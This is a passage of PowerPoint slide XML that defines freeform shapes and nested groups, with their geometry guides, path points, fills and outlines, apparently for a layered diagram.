                <p:cNvPr id="2472" name="Freeform 2308">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ACB8F3F-D245-417C-80A2-BD6E5AA4BE7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806" y="1728"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 73 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 545 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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14351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473" name="Freeform 2309">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A734DAFB-0EF1-42B2-98B1-EE009640E3B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806" y="1801"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 76 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 548 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="5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14351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474" name="Freeform 2310">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A719D0EA-D61F-42A2-8BD7-E0A516E837A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806" y="1877"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 75 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 545 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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14351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475" name="Freeform 2311">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF4ACED-A39C-477E-B599-0E4668479F1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806" y="1952"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 73 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 546 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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14351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468" name="Freeform 2312">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366865DC-8D26-4C30-A4E4-E6463575C17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94" y="1949"/>
                <a:ext cx="50" cy="850"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 113"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 113"/>
                  <a:gd name="T3" fmla="*/ 1876 h 1904"/>
                  <a:gd name="T4" fmla="*/ 113 w 113"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 113 w 113"/>
                  <a:gd name="T7" fmla="*/ 31 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 113"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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3" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113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696"/>
              </a:solidFill>
              <a:ln w="14351" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="969696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69" name="Freeform 2313">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0026AB3-76C7-4343-B5CC-56C97503161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503" y="2194"/>
                <a:ext cx="100" cy="863"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 224 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 1935"/>
                  <a:gd name="T2" fmla="*/ 224 w 224"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1935"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 1935 h 1935"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 62 h 1935"/>
                  <a:gd name="T8" fmla="*/ 224 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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4" h="1935">
                    <a:moveTo>
                      <a:pt x="224" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="224" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1935"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62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80808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70" name="Freeform 2314">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEEFD7BD-CCBC-4439-A80E-F49DFE64023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544" y="1963"/>
                <a:ext cx="908" cy="310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2036"/>
                  <a:gd name="T1" fmla="*/ 0 h 694"/>
                  <a:gd name="T2" fmla="*/ 0 w 2036"/>
                  <a:gd name="T3" fmla="*/ 149 h 694"/>
                  <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                  <a:gd name="T5" fmla="*/ 694 h 694"/>
                  <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                  <a:gd name="T7" fmla="*/ 548 h 694"/>
                  <a:gd name="T8" fmla="*/ 0 w 2036"/>
                  <a:gd name="T9" fmla="*/ 0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36" h="694">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2036" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2036" y="5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696"/>
              </a:solidFill>
              <a:ln w="14351" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="969696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71" name="Freeform 2315">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299418A3-BDA6-4F72-8EAB-9F2FA374B0B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94" y="1923"/>
                <a:ext cx="1109" cy="298"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2487"/>
                  <a:gd name="T1" fmla="*/ 59 h 669"/>
                  <a:gd name="T2" fmla="*/ 224 w 2487"/>
                  <a:gd name="T3" fmla="*/ 0 h 669"/>
                  <a:gd name="T4" fmla="*/ 2487 w 2487"/>
                  <a:gd name="T5" fmla="*/ 607 h 669"/>
                  <a:gd name="T6" fmla="*/ 2263 w 2487"/>
                  <a:gd name="T7" fmla="*/ 669 h 669"/>
                  <a:gd name="T8" fmla="*/ 0 w 2487"/>
                  <a:gd name="T9" fmla="*/ 59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7" h="669">
                    <a:moveTo>
                      <a:pt x="0" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="224" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2487" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2263" y="669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80808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681" name="Group 2302">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{505CB73C-34E6-4F71-9350-07C51CF95A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9388" y="1705091"/>
              <a:ext cx="1667452" cy="1014971"/>
              <a:chOff x="3247" y="1897"/>
              <a:chExt cx="1288" cy="784"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2280" name="Freeform 1886">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CD7201C-D466-414B-964C-D200E4AC24E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247" y="2336"/>
                <a:ext cx="1288" cy="345"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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281" name="Group 1887">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66D0259-32DD-49FB-96E1-B5F6E74892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51" y="1897"/>
                <a:ext cx="643" cy="609"/>
                <a:chOff x="1079" y="1709"/>
                <a:chExt cx="1300" cy="1250"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="2282" name="Group 1888">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3D6BC0C-9150-4957-8F1E-890EA7ADAE4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079" y="1709"/>
                  <a:ext cx="1300" cy="1250"/>
                  <a:chOff x="1079" y="1709"/>
                  <a:chExt cx="1300" cy="1250"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="2340" name="Group 1889">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D66A3933-B40B-4473-9546-BF2EA2C134D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079" y="2385"/>
                    <a:ext cx="1300" cy="574"/>
                    <a:chOff x="1079" y="2385"/>
                    <a:chExt cx="1300" cy="574"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="2434" name="Group 1890">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575D840B-9BB3-4990-806E-BE02312B937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946" y="2385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459" name="Freeform 1891">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79F1904-58F7-47C8-B95B-ACE36ECE4DD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60" name="Freeform 1892">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D470EFD-D4DE-46F4-9BBD-17B53C13D2A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61" name="Freeform 1893">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61C03DFC-6F23-4E03-81EC-A0C60223684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62" name="Freeform 1894">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C595699-A4FA-455D-ACC1-1E0AB8829A76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63" name="Freeform 1895">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDC0689F-6231-44ED-A356-04717CD450C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435" name="Group 1896">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B5EB73-2B3C-4EB5-B497-A5F98A5697A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728" y="2443"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2454" name="Freeform 1897">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{925561A3-1C6B-469F-BAB6-90C36F72915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55" name="Freeform 1898">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82FEF4C6-0434-459F-B31C-FC02B56D67C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56" name="Freeform 1899">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CEE63A6-1167-4611-A155-3E88190DE4C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57" name="Freeform 1900">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4C02D8-24E5-46A4-BF3F-F30C96D31384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58" name="Freeform 1901">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8392B7BE-2232-4F71-BFF2-7947B129E9A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436" name="Group 1902">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EABAF34-FC67-4D2A-82EE-48BAD085520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512" y="2501"/>
                      <a:ext cx="433" cy="342"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2449" name="Freeform 1903">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B77145-BA91-40D8-B323-8587028FB2B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50" name="Freeform 1904">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{710A02F5-1947-4220-BEE9-599CEC6CC9F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51" name="Freeform 1905">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387150B5-A637-47E0-8223-4F15360ED09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52" name="Freeform 1906">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4149FB2D-8F53-41FB-90B4-D7908BCC4F43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53" name="Freeform 1907">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4735802-04C2-4D0F-A099-A76907F7246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437" name="Group 1908">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308C2193-53B5-485A-AD14-C698B65E90E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295" y="2560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444" name="Freeform 1909">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63B6888-A6EB-4C9F-A5E8-7E2115F7187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45" name="Freeform 1910">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A5CCFD-77EE-49E0-8429-5A67E27AED5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46" name="Freeform 1911">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BCCDE72-CC39-45CF-85E3-A9CCD912C2E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47" name="Freeform 1912">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B6D901-BE6C-42AE-8951-5E2BB713EBA3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48" name="Freeform 1913">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F79D16-74A6-4918-B789-329EE1B0046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438" name="Group 1914">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5697BA3F-D186-457A-80DE-F2D64C61372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079" y="2618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439" name="Freeform 1915">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B41F135-3BFE-4951-A297-B276B85F7C4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40" name="Freeform 1916">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB55907-1157-4A4A-AC2A-085C420D106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41" name="Freeform 1917">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80FE668E-5C25-413B-A03C-9901179DDB2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42" name="Freeform 1918">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2077069C-6FA0-4F26-A255-33AA268718C7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43" name="Freeform 1919">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9736C8D6-196B-402C-A0B9-000856C0BF7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2341" name="Group 1920">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C903FF5-C1D8-4C96-A35C-B2575C0493D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079" y="2160"/>
                    <a:ext cx="1300" cy="574"/>
                    <a:chOff x="1079" y="2160"/>
                    <a:chExt cx="1300" cy="574"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="2404" name="Group 1921">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28517A6F-6A8A-4B1B-9F9E-0BB58ADE915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946" y="2160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429" name="Freeform 1922">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B0B858E-95A3-46DC-BF09-9964A66EA84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30" name="Freeform 1923">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE8F3C5-54FE-404C-96D9-8C40B7AE7E4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31" name="Freeform 1924">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A0E5945-78DB-4435-80C0-B298B94D63D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32" name="Freeform 1925">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C392F0FF-6C61-458D-8E37-1E6C28A5697A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33" name="Freeform 1926">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978291D2-D311-4341-B1CB-A2A60F5BEE4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405" name="Group 1927">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E246EBB8-5BCF-4207-A47D-4086F676C3B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728" y="2218"/>
                      <a:ext cx="434" cy="341"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2424" name="Freeform 1928">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C788C91-7700-49BB-8C98-B725DA8D4AE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25" name="Freeform 1929">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2BFECF2-7B41-49E7-A62B-204A6F90042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26" name="Freeform 1930">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1617897-9EEF-4ABD-84C7-228AA16D934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27" name="Freeform 1931">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A59B450-23A7-4DA7-8F10-C1932A703226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28" name="Freeform 1932">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F29EB014-C1A1-41D9-84FD-99026008E6F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406" name="Group 1933">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95225201-41DB-4C07-82EB-6CB4E1ABDE5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512" y="2276"/>
                      <a:ext cx="433" cy="342"/>
                      <a:chOff x="585" y="1098"/>
                      <a:chExt cx="662" cy="521"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="2419" name="Freeform 1934">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB7ABC6-9FC8-4229-A7B0-F2189A95490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20" name="Freeform 1935">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41C7FEFC-C12C-4F1D-BD98-4DF034D4AEE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21" name="Freeform 1936">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{642C4ABD-4A27-4409-85A8-36FCDE27EED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22" name="Freeform 1937">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09D5799D-F9BC-4A3C-8C4F-FC5DC9A335BF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23" name="Freeform 1938">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB7706AA-BA71-48D0-BE82-613D8F8182F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407" name="Group 1939">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{319BA63A-9462-41FF-9914-B88EBCF2CA0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295" y="2335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414" name="Freeform 1940">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B2D7B37-EEE3-458C-9CB0-F5B84857FA7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15" name="Freeform 1941">
                        <a:extLst>
